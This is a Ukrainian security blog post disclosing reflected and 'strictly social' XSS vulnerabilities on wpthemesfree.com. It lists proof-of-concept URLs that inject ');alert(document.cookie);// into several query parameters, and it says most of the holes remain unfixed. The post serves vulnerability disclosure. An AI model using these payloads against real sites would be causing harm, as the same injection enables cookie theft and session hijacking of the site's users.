Уразливості на wpthemesfree.com
20:14 09.02.200901.08.2008
У листопаді, 21.11.2007, я знайшов Cross-Site Scripting уразливості на проекті http://wpthemesfree.com. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
09.02.2009
XSS:
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- цікавий
- html включення
XSS (IE):
При кліку на лінці “Add to Favorites”. Це strictly social XSS.
http://wpthemesfree.com/index.php?order=');alert(document.cookie);//
http://wpthemesfree.com/index.php?page=');alert(document.cookie);//
http://wpthemesfree.com/index.php?category=');alert(document.cookie);//
http://wpthemesfree.com/index.php?property=');alert(document.cookie);//
http://wpthemesfree.com/index.php?');alert(document.cookie);//
Всі сторінки на сайті, що мають лінку “Add to Favorites”, вразливі до даної XSS.
Якщо strictly social XSS вже виправлені, то всі reflected XSS уразливості досі не виправлені.